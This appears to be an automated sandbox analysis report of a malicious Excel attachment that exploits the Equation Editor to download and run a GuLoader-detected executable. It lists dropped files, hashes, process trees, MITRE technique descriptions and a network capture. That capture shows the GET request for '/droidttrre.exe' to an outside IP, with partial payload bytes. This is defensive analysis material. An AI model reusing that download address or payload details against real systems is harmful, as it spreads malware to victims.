Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...?..A...O...V..D.t...8..Y.n....V.$......../..e...of.g.pm..pF(..,..Oq8.xb........~....$.]......y..".(..7.-.._....0...eUS.c..Y....}.J..p...M.....q=.=.B`....IEND.B`.

C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	243209
Entropy (8bit):	5.969458574226536
Encrypted:	false
SSDEEP:	6144:RPVByzfb1YfMq48FKMqCQQU7k1TAH1OobTrEPvQvHk8hep:RPKqUjHM/PvQvHk8hep
MD5:	2510EF915FD96CB0C5D947BA98CB751D
SHA1:	AE10088DD6EC5BD0607FD5848A746AE57DCDC20E
SHA-256:	02528C6E3F317B8FA9010BED22383D9BF696CC3DC9B97CC7FF81A445BE470FA1
SHA-512:	ACA3ED02461EB0D70EF7BF5A74F1E9C7D20446349A02485A49BE3530F9C7CCEEE8F74A412FA8FD9002A815762F240C3C89AEACC97FF84130BE428F8C9ED73E05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"...%............P.........C..............................0............`... .........................................V....................p..p............ ...............................T..(...................8................................text...............................`..`.data........ ......................@....rdata..`9...0...:..................@..@.pdata..p....p.......N..............@..@.xdata..\............f..............@..@.bss....P................................edata..V............~..............@..@.idata..............................@....CRT....X...........................@....tls................................@....reloc....... ......................@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF483FEDB67C914879.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	884736
Entropy (8bit):	5.929365373182359
Encrypted:	false
SSDEEP:	12288:H8FSe/L5ZcP0pYqezVZ6NVrjlSf0nMhdt2nbJR3xAN/lgP4OhE:H6SWa0pzexZ6frjlYKS2dJm/yN
MD5:	71C5C71EC5A5FDD6B95C5CD618B2D7A2
SHA1:	10B619F785447D9C289F455BB96CC78FB5E10113
SHA-256:	5E5C4C2716ED5B8E1C661E8D26A73156F1E24B54A78900E370F2BD90A9BF66FF
SHA-512:	CAE965EFB9F1A4FAF3EE5DE87C47EAA7A65D08C6B08D64D97F3716DD8005D3B12950EE05317670C7084B8DF8E0C912CC67842ABD62441EC407CB4F378D787C3C
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\venxajlddf.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1449584
Entropy (8bit):	7.9198763448081495
Encrypted:	false
SSDEEP:	24576:KY9Mbnf2VYqw1ubzB3Gk+VQOIT/DrboejxAseAb7pexIlu7T6SW4gjs2H:39Mbnf5+PwkEs/ToejptpeilqT6SL4
MD5:	2A384E15F8133C8B9ECEFA4DA1D96CEE
SHA1:	346475908F4F76A3C76D7E6D60E58DEBAB862DAA
SHA-256:	401BAE096C7E9DF1B24BF3A34E4A711A2C955700A8B719972B45BDFD10DDEBD2
SHA-512:	73E97BCB16362476259FC154E293EC2B0DAA9FF011902D406330EB3AF7352C9DEC6CBF4709C6C09BA7A0FC18E5FECC8F90D07C64A9F96B7ED071F12ECFCD4A30
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.................................[.....@.............................................h-..........P... ............................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...h-..........................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.998091982797452
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls
File size:	750902
MD5:	3fed4357a9a31f6d784d90e0e2828cef
SHA1:	b10fe00a3142c331aa805a78b5e01e9fa73d9c6b
SHA256:	bc03e79179795e31ba88934475f0746f25a7382a157ab005a54cae03b83c797d
SHA512:	4442b981e4797c3d25c536b92a765f72a38147ec2741a638c6d54226375f60bc30526a4cf1bd26c8e047afbb1c08a57aa86f4341e4508abc06980c3440297c43
SSDEEP:	12288:UML7nvXmvi+sc3vTA2Q3J1XyQEAHd/vcjtCbQ0kMYO2eFUOoV35YqT00hXTrS2i1:JmviHc37AXJwQNc2RKbsd0hnS2Aaqvn
TLSH:	20F423B957FBC328D35E472592207FB81CBCF1114E133E768D22769D86228A6CE5E11E
File Content Preview:	PK........Z..T..Uj....3.......[Content_Types].xmlUT..../.b./.b./.b.TMO.@.........i9 ..8...H....m.q.....)..z<i.......I.~........b..M...V.Q.o.6~Z.?....Q )....j....W'?F...X0.c-fD.RJlf..V!.gK..S..i.j.j..l08.M...J...j4.V.Y~..z.I.SQ....T-...\|/."..[..2[.c.X..R

File Icon


Icon Hash:	e4eea286a4b4bcb4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2022 12:02:27.140098095 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.167320967 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.167413950 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.168530941 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198072910 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198128939 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198162079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198191881 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198223114 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198234081 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198241949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198255062 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198266983 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198278904 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198285103 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198302031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198312998 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198326111 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198328972 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198349953 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198357105 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198383093 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225797892 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225845098 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225868940 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225892067 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225897074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225912094 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225922108 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225927114 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225948095 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225951910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225972891 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225980043 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225999117 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226005077 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226023912 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226030111 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226048946 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226054907 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226073980 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226080894 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226100922 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226105928 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226125956 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226131916 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226150036 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226159096 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226176023 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226181030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226201057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226207972 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226226091 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226232052 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226252079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226257086 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226275921 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226283073 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226300955 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226305962 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226331949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.232940912 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253705978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253740072 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253766060 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253778934 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253791094 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253803015 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253807068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253824949 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253833055 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253849983 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253869057 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253876925 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253882885 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253897905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253906012 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253923893 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253927946 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253948927 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253956079 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253971100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253978968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253994942 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253994942 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254019976 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254028082 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254045010 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254050016 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254072905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254080057 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254096031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254102945 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254121065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254126072 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254144907 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254153013 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254175901 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254183054 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254200935 CEST	80	49171	2.56.57.22	192.168.2.22

HTTP Request Dependency Graph

2.56.57.22

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	2.56.57.22	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 27, 2022 12:02:27.168530941 CEST	2	OUT	GET /droidttrre.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 2.56.57.22 Connection: Keep-Alive
May 27, 2022 12:02:27.198072910 CEST	3	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 24 May 2022 18:13:44 GMT Accept-Ranges: bytes ETag: "abe39719a6fd81:0" Server: Microsoft-IIS/10.0 Date: Fri, 27 May 2022 10:02:27 GMT Content-Length: 1449584 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 00 40 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 07 00 00 04 00 00 5b e9 16 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 b0 05 00 68 2d 02 00 00 00 00 00 00 00 00 00 50 ff 15 00 20 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 03 02 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 03 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 2d 02 00 00 b0 05 00 00 2e 02 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 68 a2 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 70 a2 42 00 8d 45 a4 57 50 ff 75 08 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf_9PfPgLPf_;PfsVPf.V`PfRichPfPELOah*@6@[@h-P .textvfh `.rdatal@@.datax@.ndata.rsrch-.@@U\}t+}FEuHhBHPuuu@BSV5pBEWPu

Target ID:	0
Start time:	12:01:21
Start date:	27/05/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f6e0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXEPID: 1112, Parent PID: 576

General

Target ID:	2
Start time:	12:01:42
Start date:	27/05/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: venxajlddf.exePID: 2944, Parent PID: 1112

General

Target ID:	4
Start time:	12:01:46
Start date:	27/05/2022
Path:	C:\Users\user\AppData\Roaming\venxajlddf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\venxajlddf.exe
Imagebase:	0x400000
File size:	1449584 bytes
MD5 hash:	2A384E15F8133C8B9ECEFA4DA1D96CEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1181440399.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 32%, Metadefender, Browse Detection: 38%, ReversingLabs
Reputation:	low

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
